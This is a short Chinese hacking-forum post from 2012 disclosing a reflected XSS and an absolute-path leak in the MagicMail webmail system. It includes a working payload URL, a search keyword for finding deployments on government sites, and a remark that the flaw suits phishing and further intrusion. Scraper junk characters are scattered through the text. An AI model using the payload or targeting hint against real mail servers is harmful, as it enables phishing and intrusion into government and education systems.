中国网络渗透测试联盟

标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞 [打印本页]
作者: admin    时间: 2012-11-9 20:38
标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
& U3 E* S) P. T; I1 a: y+ \. y6 y: O6 n

6 q$ E: {- T( k7 x: G" N: w- p包含  一个反射性XSS  以及  绝对路径泄漏9 j' @- G* W8 }- v3 P
看了看 貌似全部是linux的。, b  u: v* @! ?1 h/ j6 `2 O; K% Z) W

, {* v8 ~$ p) L' m: z" G关键字:迈捷邮件系统 by MagicMail  D) F6 {. }5 S% @" E
" I- i' b+ K, O2 ?* ^
可以看到很多政府网站都用这个邮件系统
. ^& z* I5 y/ _& Y2 H9 S3 I( r6 Y, _0 M$ z
绝对路径 http://madman.in/index.php?login_type=declare&language=) m& e$ ?" I# D) ?' H2 A

3 `, g6 C/ Q( {4 ^1 \4 z+ Y% H
4 h% _8 D3 r' }" W! V* s' |: s( {: y8 X; c3 a4 [3 m9 g
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E4 O; j6 J8 n7 Y% h" j

2 y% |9 K7 a) n; Y+ S8 J* c, X
& p8 x5 v1 w6 w5 R2 Z% M
1 ^0 T0 V& e7 k* H4 v) o0 ?: N虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等. c/ m' _+ Q' ?8 w; _1 d5 z; |

# J: H1 L) I3 W3 Q修复方案:看官方补丁吧。
1 w/ r) Q$ c8 h) ?  }) R; k



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2